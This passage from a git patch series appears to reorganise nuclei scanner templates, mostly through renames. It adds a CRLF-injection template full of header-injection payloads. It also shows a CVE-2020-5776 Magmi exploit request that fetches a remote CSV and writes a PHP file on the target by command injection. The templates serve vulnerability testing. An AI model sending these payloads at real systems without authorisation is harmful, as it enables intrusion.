 rename {exposed-files => exposures/files}/lazy-file.yaml (100%)
 rename {exposed-files => exposures/files}/server-private-keys.yaml (100%)
 rename {exposed-files => exposures/files}/xprober-service.yaml (100%)
 rename {exposed-files => exposures}/logs/elmah-log-file.yaml (100%)
 rename {exposed-files => exposures}/logs/error-logs.yaml (100%)
 rename {exposed-files => exposures/logs}/trace-axd-detect.yaml (100%)
 rename takeovers/s3-subtakeover.yaml => misconfiguration/aws-redirect.yaml (80%)
 rename {exposed-files => misconfiguration}/docker-registry.yaml (100%)
 rename {vulnerabilities => misconfiguration}/symfony-debugmode.yaml (100%)
 rename takeovers/{detect-all-takeovers.yaml => subdomain-takeover.yaml} (100%)
 rename {exposed-files => technologies}/graylog-api-browser.yaml (100%)
 rename {exposed-files => technologies}/telerik-dialoghandler-detect.yaml (100%)
 rename {exposed-files => technologies}/telerik-fileupload-detect.yaml (100%)
 create mode 100644 vulnerabilities/generic/crlf-injection.yaml
 rename vulnerabilities/generic/{top-15-xss.yaml => top-xss-params.yaml} (98%)
 rename vulnerabilities/{crlf-injection.yaml => generic/url-redirect.yaml} (100%)
 rename vulnerabilities/{ => ibm}/eclipse-help-system-xss.yaml (100%)
 rename vulnerabilities/{ => ibm}/ibm-infoprint-directory-traversal.yaml (100%)
 rename vulnerabilities/{ => other}/bullwark-momentum-series-directory-traversal.yaml (100%)
 rename vulnerabilities/{ => other}/cached-aem-pages.yaml (100%)
 rename vulnerabilities/{ => other}/couchdb-adminparty.yaml (100%)
 rename vulnerabilities/{ => other}/discourse-xss.yaml (100%)
 rename vulnerabilities/{ => other}/mcafee-epo-rce.yaml (100%)
 rename vulnerabilities/{ => other}/microstrategy-ssrf.yaml (100%)
 rename vulnerabilities/{ => other}/mida-eframework-xss.yaml (100%)
 rename vulnerabilities/{ => other}/nginx-module-vts-xss.yaml (100%)
 rename vulnerabilities/{ => other}/nuuo-nvrmini2-rce.yaml (100%)
 rename vulnerabilities/{ => other}/pdf-signer-ssti-to-rce.yaml (100%)
 rename vulnerabilities/{ => other}/rce-shellshock-user-agent.yaml (100%)
 rename vulnerabilities/{ => other}/rce-via-java-deserialization.yaml (100%)
 rename vulnerabilities/{ => other}/rconfig-rce.yaml (100%)
 rename vulnerabilities/{ => other}/sick-beard-xss.yaml (100%)
 rename vulnerabilities/{ => other}/symantec-messaging-gateway.yaml (100%)
 rename vulnerabilities/{ => other}/tikiwiki-reflected-xss.yaml (100%)
 rename vulnerabilities/{ => other}/twig-php-ssti.yaml (100%)
 rename vulnerabilities/{ => other}/vpms-auth-bypass.yaml (100%)
 rename vulnerabilities/{ => other}/wems-manager-xss.yaml (100%)
 rename vulnerabilities/{ => other}/zms-auth-bypass.yaml (100%)
 rename vulnerabilities/{ => wordpress}/sassy-social-share.yaml (100%)

diff --git a/vulnerabilities/tomcat-manager-pathnormalization.yaml b/exposed-panels/tomcat-manager-pathnormalization.yaml
similarity index 100%
rename from vulnerabilities/tomcat-manager-pathnormalization.yaml
rename to exposed-panels/tomcat-manager-pathnormalization.yaml
diff --git a/exposed-files/apis/swagger-panel.yaml b/exposures/apis/swagger-api.yaml
similarity index 98%
rename from exposed-files/apis/swagger-panel.yaml
rename to exposures/apis/swagger-api.yaml
index 89c137c8b4..b02f519310 100644
--- a/exposed-files/apis/swagger-panel.yaml
+++ b/exposures/apis/swagger-api.yaml
@@ -1,4 +1,4 @@
-id: swagger-panel
+id: swagger-apis
 
 info:
   name: Swagger API Panel
diff --git a/exposed-files/apis/wadl-files.yaml b/exposures/apis/wadl-api.yaml
similarity index 98%
rename from exposed-files/apis/wadl-files.yaml
rename to exposures/apis/wadl-api.yaml
index 090d4d8819..83f800b6e1 100644
--- a/exposed-files/apis/wadl-files.yaml
+++ b/exposures/apis/wadl-api.yaml
@@ -1,4 +1,4 @@
-id: wadl-files
+id: wadl-api
 
 info:
   name: wadl file disclosure
diff --git a/exposed-files/apis/wsdl-detect.yaml b/exposures/apis/wsdl-api.yaml
similarity index 89%
rename from exposed-files/apis/wsdl-detect.yaml
rename to exposures/apis/wsdl-api.yaml
index 4b57f87f03..44d7f7b49a 100644
--- a/exposed-files/apis/wsdl-detect.yaml
+++ b/exposures/apis/wsdl-api.yaml
@@ -1,4 +1,4 @@
-id: wsdl-detect
+id: wsdl-api
 
 info:
   name: wsdl-detect
diff --git a/exposed-files/backups/sql-dump.yaml b/exposures/backups/sql-dump.yaml
similarity index 100%
rename from exposed-files/backups/sql-dump.yaml
rename to exposures/backups/sql-dump.yaml
diff --git a/exposed-files/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml
similarity index 100%
rename from exposed-files/backups/zip-backup-files.yaml
rename to exposures/backups/zip-backup-files.yaml
diff --git a/exposed-files/configs/composer-config.yaml b/exposures/configs/composer-config.yaml
similarity index 100%
rename from exposed-files/configs/composer-config.yaml
rename to exposures/configs/composer-config.yaml
diff --git a/exposed-files/configs/exposed-svn.yaml b/exposures/configs/exposed-svn.yaml
similarity index 100%
rename from exposed-files/configs/exposed-svn.yaml
rename to exposures/configs/exposed-svn.yaml
diff --git a/exposed-files/configs/git-config-nginxoffbyslash.yaml b/exposures/configs/git-config-nginxoffbyslash.yaml
similarity index 100%
rename from exposed-files/configs/git-config-nginxoffbyslash.yaml
rename to exposures/configs/git-config-nginxoffbyslash.yaml
diff --git a/exposed-files/configs/git-config.yaml b/exposures/configs/git-config.yaml
similarity index 100%
rename from exposed-files/configs/git-config.yaml
rename to exposures/configs/git-config.yaml
diff --git a/exposed-files/htpasswd-detection.yaml b/exposures/configs/htpasswd-detection.yaml
similarity index 100%
rename from exposed-files/htpasswd-detection.yaml
rename to exposures/configs/htpasswd-detection.yaml
diff --git a/exposed-files/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml
similarity index 100%
rename from exposed-files/configs/laravel-env.yaml
rename to exposures/configs/laravel-env.yaml
diff --git a/exposed-files/configs/magento-config.yaml b/exposures/configs/magento-config.yaml
similarity index 100%
rename from exposed-files/configs/magento-config.yaml
rename to exposures/configs/magento-config.yaml
diff --git a/exposed-files/configs/owncloud-config.yaml b/exposures/configs/owncloud-config.yaml
similarity index 100%
rename from exposed-files/configs/owncloud-config.yaml
rename to exposures/configs/owncloud-config.yaml
diff --git a/exposed-files/configs/package-json.yaml b/exposures/configs/package-json.yaml
similarity index 100%
rename from exposed-files/configs/package-json.yaml
rename to exposures/configs/package-json.yaml
diff --git a/exposed-files/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml
similarity index 100%
rename from exposed-files/configs/phpinfo.yaml
rename to exposures/configs/phpinfo.yaml
diff --git a/exposed-files/configs/redmine-db-config.yaml b/exposures/configs/redmine-db-config.yaml
similarity index 100%
rename from exposed-files/configs/redmine-db-config.yaml
rename to exposures/configs/redmine-db-config.yaml
diff --git a/exposed-files/server-status-localhost.yaml b/exposures/configs/server-status-localhost.yaml
similarity index 100%
rename from exposed-files/server-status-localhost.yaml
rename to exposures/configs/server-status-localhost.yaml
diff --git a/exposed-files/syfmony-profiler.yaml b/exposures/configs/syfmony-profiler.yaml
similarity index 100%
rename from exposed-files/syfmony-profiler.yaml
rename to exposures/configs/syfmony-profiler.yaml
diff --git a/exposed-files/configs/web-config.yaml b/exposures/configs/web-config.yaml
similarity index 100%
rename from exposed-files/configs/web-config.yaml
rename to exposures/configs/web-config.yaml
diff --git a/exposed-files/domcfg-page.yaml b/exposures/files/domcfg-page.yaml
similarity index 100%
rename from exposed-files/domcfg-page.yaml
rename to exposures/files/domcfg-page.yaml
diff --git a/exposed-files/drupal-install.yaml b/exposures/files/drupal-install.yaml
similarity index 100%
rename from exposed-files/drupal-install.yaml
rename to exposures/files/drupal-install.yaml
diff --git a/exposed-files/ds_store.yaml b/exposures/files/ds_store.yaml
similarity index 100%
rename from exposed-files/ds_store.yaml
rename to exposures/files/ds_store.yaml
diff --git a/exposed-files/filezilla.yaml b/exposures/files/filezilla.yaml
similarity index 100%
rename from exposed-files/filezilla.yaml
rename to exposures/files/filezilla.yaml
diff --git a/exposed-files/lazy-file.yaml b/exposures/files/lazy-file.yaml
similarity index 100%
rename from exposed-files/lazy-file.yaml
rename to exposures/files/lazy-file.yaml
diff --git a/exposed-files/server-private-keys.yaml b/exposures/files/server-private-keys.yaml
similarity index 100%
rename from exposed-files/server-private-keys.yaml
rename to exposures/files/server-private-keys.yaml
diff --git a/exposed-files/xprober-service.yaml b/exposures/files/xprober-service.yaml
similarity index 100%
rename from exposed-files/xprober-service.yaml
rename to exposures/files/xprober-service.yaml
diff --git a/exposed-files/logs/elmah-log-file.yaml b/exposures/logs/elmah-log-file.yaml
similarity index 100%
rename from exposed-files/logs/elmah-log-file.yaml
rename to exposures/logs/elmah-log-file.yaml
diff --git a/exposed-files/logs/error-logs.yaml b/exposures/logs/error-logs.yaml
similarity index 100%
rename from exposed-files/logs/error-logs.yaml
rename to exposures/logs/error-logs.yaml
diff --git a/exposed-files/trace-axd-detect.yaml b/exposures/logs/trace-axd-detect.yaml
similarity index 100%
rename from exposed-files/trace-axd-detect.yaml
rename to exposures/logs/trace-axd-detect.yaml
diff --git a/takeovers/s3-subtakeover.yaml b/misconfiguration/aws-redirect.yaml
similarity index 80%
rename from takeovers/s3-subtakeover.yaml
rename to misconfiguration/aws-redirect.yaml
index 66eced0530..911ca6a4dd 100644
--- a/takeovers/s3-subtakeover.yaml
+++ b/misconfiguration/aws-redirect.yaml
@@ -1,12 +1,10 @@
-id: s3-subtakeover
+id: aws-redirect
 
 info:
   name: Subdomain takeover AWS S3
   author: manikanta a.k.a @secureitmania
-  severity: high
-
-  # Source:- https://link.medium.com/fgXKJHR9P7
-
+  severity: info
+  reference: https://link.medium.com/fgXKJHR9P7
 
 requests:
   - method: GET
diff --git a/exposed-files/docker-registry.yaml b/misconfiguration/docker-registry.yaml
similarity index 100%
rename from exposed-files/docker-registry.yaml
rename to misconfiguration/docker-registry.yaml
diff --git a/misconfiguration/larvel-debug.yaml b/misconfiguration/larvel-debug.yaml
index 9ce2451224..2235ef16af 100644
--- a/misconfiguration/larvel-debug.yaml
+++ b/misconfiguration/larvel-debug.yaml
@@ -9,8 +9,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}"
-      - "{{BaseURL}}:8081"
-      - "{{BaseURL}}:9001"
 
     matchers-condition: and
     matchers:
diff --git a/vulnerabilities/symfony-debugmode.yaml b/misconfiguration/symfony-debugmode.yaml
similarity index 100%
rename from vulnerabilities/symfony-debugmode.yaml
rename to misconfiguration/symfony-debugmode.yaml
diff --git a/takeovers/detect-all-takeovers.yaml b/takeovers/subdomain-takeover.yaml
similarity index 100%
rename from takeovers/detect-all-takeovers.yaml
rename to takeovers/subdomain-takeover.yaml
diff --git a/exposed-files/graylog-api-browser.yaml b/technologies/graylog-api-browser.yaml
similarity index 100%
rename from exposed-files/graylog-api-browser.yaml
rename to technologies/graylog-api-browser.yaml
diff --git a/exposed-files/telerik-dialoghandler-detect.yaml b/technologies/telerik-dialoghandler-detect.yaml
similarity index 100%
rename from exposed-files/telerik-dialoghandler-detect.yaml
rename to technologies/telerik-dialoghandler-detect.yaml
diff --git a/exposed-files/telerik-fileupload-detect.yaml b/technologies/telerik-fileupload-detect.yaml
similarity index 100%
rename from exposed-files/telerik-fileupload-detect.yaml
rename to technologies/telerik-fileupload-detect.yaml
diff --git a/vulnerabilities/generic/crlf-injection.yaml b/vulnerabilities/generic/crlf-injection.yaml
new file mode 100644
index 0000000000..bdb6cd7889
--- /dev/null
+++ b/vulnerabilities/generic/crlf-injection.yaml
@@ -0,0 +1,25 @@
+id: crlf-injection
+
+info:
+  name: CRLF injection
+  author: melbadry9 & nadino & xElkomy
+  severity: low
+  description: Improper sanitization of CRLF sequences.
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection"
+      - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection"  # unicode bypass
+      - "{{BaseURL}}/%0DSet-Cookie:crlfinjection=crlfinjection"
+      - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
+      - "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection"
+      - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.."  # Apache
+      - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"  # CVE-2016-4975
+      - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
+
+    matchers:
+      - type: regex
+        regex:
+          - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
+        part: header
diff --git a/vulnerabilities/generic/top-15-xss.yaml b/vulnerabilities/generic/top-xss-params.yaml
similarity index 98%
rename from vulnerabilities/generic/top-15-xss.yaml
rename to vulnerabilities/generic/top-xss-params.yaml
index 49e6907b0a..88cea7c922 100644
--- a/vulnerabilities/generic/top-15-xss.yaml
+++ b/vulnerabilities/generic/top-xss-params.yaml
@@ -1,5 +1,5 @@
 # id contains the unique identifier for the template.
-id: top-15-xss
+id: top-xss-params
 
 info:
   # Name is the name of the template
diff --git a/vulnerabilities/crlf-injection.yaml b/vulnerabilities/generic/url-redirect.yaml
similarity index 100%
rename from vulnerabilities/crlf-injection.yaml
rename to vulnerabilities/generic/url-redirect.yaml
diff --git a/vulnerabilities/eclipse-help-system-xss.yaml b/vulnerabilities/ibm/eclipse-help-system-xss.yaml
similarity index 100%
rename from vulnerabilities/eclipse-help-system-xss.yaml
rename to vulnerabilities/ibm/eclipse-help-system-xss.yaml
diff --git a/vulnerabilities/ibm-infoprint-directory-traversal.yaml b/vulnerabilities/ibm/ibm-infoprint-directory-traversal.yaml
similarity index 100%
rename from vulnerabilities/ibm-infoprint-directory-traversal.yaml
rename to vulnerabilities/ibm/ibm-infoprint-directory-traversal.yaml
diff --git a/vulnerabilities/bullwark-momentum-series-directory-traversal.yaml b/vulnerabilities/other/bullwark-momentum-series-directory-traversal.yaml
similarity index 100%
rename from vulnerabilities/bullwark-momentum-series-directory-traversal.yaml
rename to vulnerabilities/other/bullwark-momentum-series-directory-traversal.yaml
diff --git a/vulnerabilities/cached-aem-pages.yaml b/vulnerabilities/other/cached-aem-pages.yaml
similarity index 100%
rename from vulnerabilities/cached-aem-pages.yaml
rename to vulnerabilities/other/cached-aem-pages.yaml
diff --git a/vulnerabilities/couchdb-adminparty.yaml b/vulnerabilities/other/couchdb-adminparty.yaml
similarity index 100%
rename from vulnerabilities/couchdb-adminparty.yaml
rename to vulnerabilities/other/couchdb-adminparty.yaml
diff --git a/vulnerabilities/discourse-xss.yaml b/vulnerabilities/other/discourse-xss.yaml
similarity index 100%
rename from vulnerabilities/discourse-xss.yaml
rename to vulnerabilities/other/discourse-xss.yaml
diff --git a/vulnerabilities/mcafee-epo-rce.yaml b/vulnerabilities/other/mcafee-epo-rce.yaml
similarity index 100%
rename from vulnerabilities/mcafee-epo-rce.yaml
rename to vulnerabilities/other/mcafee-epo-rce.yaml
diff --git a/vulnerabilities/microstrategy-ssrf.yaml b/vulnerabilities/other/microstrategy-ssrf.yaml
similarity index 100%
rename from vulnerabilities/microstrategy-ssrf.yaml
rename to vulnerabilities/other/microstrategy-ssrf.yaml
diff --git a/vulnerabilities/mida-eframework-xss.yaml b/vulnerabilities/other/mida-eframework-xss.yaml
similarity index 100%
rename from vulnerabilities/mida-eframework-xss.yaml
rename to vulnerabilities/other/mida-eframework-xss.yaml
diff --git a/vulnerabilities/nginx-module-vts-xss.yaml b/vulnerabilities/other/nginx-module-vts-xss.yaml
similarity index 100%
rename from vulnerabilities/nginx-module-vts-xss.yaml
rename to vulnerabilities/other/nginx-module-vts-xss.yaml
diff --git a/vulnerabilities/nuuo-nvrmini2-rce.yaml b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml
similarity index 100%
rename from vulnerabilities/nuuo-nvrmini2-rce.yaml
rename to vulnerabilities/other/nuuo-nvrmini2-rce.yaml
diff --git a/vulnerabilities/pdf-signer-ssti-to-rce.yaml b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
similarity index 100%
rename from vulnerabilities/pdf-signer-ssti-to-rce.yaml
rename to vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
diff --git a/vulnerabilities/rce-shellshock-user-agent.yaml b/vulnerabilities/other/rce-shellshock-user-agent.yaml
similarity index 100%
rename from vulnerabilities/rce-shellshock-user-agent.yaml
rename to vulnerabilities/other/rce-shellshock-user-agent.yaml
diff --git a/vulnerabilities/rce-via-java-deserialization.yaml b/vulnerabilities/other/rce-via-java-deserialization.yaml
similarity index 100%
rename from vulnerabilities/rce-via-java-deserialization.yaml
rename to vulnerabilities/other/rce-via-java-deserialization.yaml
diff --git a/vulnerabilities/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml
similarity index 100%
rename from vulnerabilities/rconfig-rce.yaml
rename to vulnerabilities/other/rconfig-rce.yaml
diff --git a/vulnerabilities/sick-beard-xss.yaml b/vulnerabilities/other/sick-beard-xss.yaml
similarity index 100%
rename from vulnerabilities/sick-beard-xss.yaml
rename to vulnerabilities/other/sick-beard-xss.yaml
diff --git a/vulnerabilities/symantec-messaging-gateway.yaml b/vulnerabilities/other/symantec-messaging-gateway.yaml
similarity index 100%
rename from vulnerabilities/symantec-messaging-gateway.yaml
rename to vulnerabilities/other/symantec-messaging-gateway.yaml
diff --git a/vulnerabilities/tikiwiki-reflected-xss.yaml b/vulnerabilities/other/tikiwiki-reflected-xss.yaml
similarity index 100%
rename from vulnerabilities/tikiwiki-reflected-xss.yaml
rename to vulnerabilities/other/tikiwiki-reflected-xss.yaml
diff --git a/vulnerabilities/twig-php-ssti.yaml b/vulnerabilities/other/twig-php-ssti.yaml
similarity index 100%
rename from vulnerabilities/twig-php-ssti.yaml
rename to vulnerabilities/other/twig-php-ssti.yaml
diff --git a/vulnerabilities/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml
similarity index 100%
rename from vulnerabilities/vpms-auth-bypass.yaml
rename to vulnerabilities/other/vpms-auth-bypass.yaml
diff --git a/vulnerabilities/wems-manager-xss.yaml b/vulnerabilities/other/wems-manager-xss.yaml
similarity index 100%
rename from vulnerabilities/wems-manager-xss.yaml
rename to vulnerabilities/other/wems-manager-xss.yaml
diff --git a/vulnerabilities/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml
similarity index 100%
rename from vulnerabilities/zms-auth-bypass.yaml
rename to vulnerabilities/other/zms-auth-bypass.yaml
diff --git a/vulnerabilities/sassy-social-share.yaml b/vulnerabilities/wordpress/sassy-social-share.yaml
similarity index 100%
rename from vulnerabilities/sassy-social-share.yaml
rename to vulnerabilities/wordpress/sassy-social-share.yaml

From eaaf56e9da7ffee4a2122ecb020057f0e4fa300b Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Sat, 9 Jan 2021 18:58:57 +0530
Subject: [PATCH 25/85] workflow updates

---
 .nuclei-ignore                                    |  4 ++--
 cves/2020/CVE-2020-5776.yaml                      |  2 +-
 cves/2020/CVE-2020-6287.yaml                      |  2 +-
 {technologies => exposed-panels}/jira-detect.yaml |  0
 fuzzing/basic-auth-bruteforce.yaml                |  2 +-
 fuzzing/wp-plugin-scan.yaml                       |  2 +-
 workflows/cisco-asa-workflow.yaml                 |  2 +-
 workflows/grafana-workflow.yaml                   |  4 ++--
 workflows/jira-workflow.yaml                      |  8 ++------
 workflows/mida-eframework-workflow.yaml           |  2 +-
 workflows/rabbitmq-workflow.yaml                  |  4 ++--
 workflows/solarwinds-orion-workflow.yaml          |  4 ++--
 workflows/springboot-workflow.yaml                |  3 +--
 workflows/wordpress-workflow.yaml                 | 15 +--------------
 14 files changed, 18 insertions(+), 36 deletions(-)
 rename {technologies => exposed-panels}/jira-detect.yaml (100%)

diff --git a/.nuclei-ignore b/.nuclei-ignore
index f565648fa6..2de13a9905 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -22,8 +22,8 @@ vulnerabilities/x-forwarded-host-injection.yaml
 fuzzing/
 
 # Wordlist directory contains payload to be used with templates. 
-wordlists/
-misc/
+helpers/
+miscellaneous/
 
 # Workflows are excluded from default run to avoid duplicate scans.
 workflows/
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-5776.yaml b/cves/2020/CVE-2020-5776.yaml
index 5a04ba81be..0c7e24a866 100644
--- a/cves/2020/CVE-2020-5776.yaml
+++ b/cves/2020/CVE-2020-5776.yaml
@@ -20,7 +20,7 @@ requests:
         Content-type: application/x-www-form-urlencoded
         Connection: close
 
-        profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
+        profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
       - |
         POST /magmi/web/magmi_run.php HTTP/1.1
         Host: {{Hostname}}
diff --git a/cves/2020/CVE-2020-6287.yaml b/cves/2020/CVE-2020-6287.yaml
index f99943bae8..b0d8716cb7 100644
--- a/cves/2020/CVE-2020-6287.yaml
+++ b/cves/2020/CVE-2020-6287.yaml
@@ -17,7 +17,7 @@ info:
 
 requests:
   - payloads:
-      data: "payloads/CVE-2020-6287.xml"
+      data: helpers/payloads/CVE-2020-6287.xml
     raw:
       - |
         POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
diff --git a/technologies/jira-detect.yaml b/exposed-panels/jira-detect.yaml
similarity index 100%
rename from technologies/jira-detect.yaml
rename to exposed-panels/jira-detect.yaml
diff --git a/fuzzing/basic-auth-bruteforce.yaml b/fuzzing/basic-auth-bruteforce.yaml
index bd812df538..3ec202210b 100644
--- a/fuzzing/basic-auth-bruteforce.yaml
+++ b/fuzzing/basic-auth-bruteforce.yaml
@@ -2,7 +2,7 @@ id: basic-auth-bruteforce
 
 info:
   name: Basic Auth Bruteforce
-  author: "@w4cky_"
+  author: w4cky_
   severity: high
 
   # Impotent Notes:-
diff --git a/fuzzing/wp-plugin-scan.yaml b/fuzzing/wp-plugin-scan.yaml
index 68e783a268..26e06c7894 100644
--- a/fuzzing/wp-plugin-scan.yaml
+++ b/fuzzing/wp-plugin-scan.yaml
@@ -8,7 +8,7 @@ info:
 requests:
 
   - payloads:
-      plugin_wordlist: wordlists/wp-plugins.txt
+      plugin_wordlist: helpers/wordlists/wp-plugins.txt
 
       # Thanks to RandomRobbieBF for the wordlist
       # https://github.com/RandomRobbieBF/wordpress-plugin-list
diff --git a/workflows/cisco-asa-workflow.yaml b/workflows/cisco-asa-workflow.yaml
index f7b4996622..00c8369277 100644
--- a/workflows/cisco-asa-workflow.yaml
+++ b/workflows/cisco-asa-workflow.yaml
@@ -10,7 +10,7 @@ info:
 
 workflows:
 
-  - template: panels/cisco-asa-panel.yaml
+  - template: exposed-panels/cisco-asa-panel.yaml
 
     subtemplates:
       - template: cves/2020/CVE-2020-3187.yaml
diff --git a/workflows/grafana-workflow.yaml b/workflows/grafana-workflow.yaml
index cc1c9b28f2..92d69b997f 100644
--- a/workflows/grafana-workflow.yaml
+++ b/workflows/grafana-workflow.yaml
@@ -10,7 +10,7 @@ info:
 
 workflows:
 
-  - template: panels/grafana-detect.yaml
+  - template: exposed-panels/grafana-detect.yaml
 
     subtemplates:
-      - template: default-credentials/grafana-default-credential.yaml
\ No newline at end of file
+      - template: default-logins/grafana-default-credential.yaml
\ No newline at end of file
diff --git a/workflows/jira-workflow.yaml b/workflows/jira-workflow.yaml
index 00fc16e057..f2e06b990f 100644
--- a/workflows/jira-workflow.yaml
+++ b/workflows/jira-workflow.yaml
@@ -10,7 +10,7 @@ info:
 
 workflows:
 
-  - template: technologies/jira-detect.yaml
+  - template: exposed-panels/jira-detect.yaml
 
     subtemplates:
       - template: cves/2017/CVE-2017-9506.yaml
@@ -23,8 +23,4 @@ workflows:
       - template: cves/2019/CVE-2019-11581.yaml
       - template: cves/2020/CVE-2020-14179.yaml
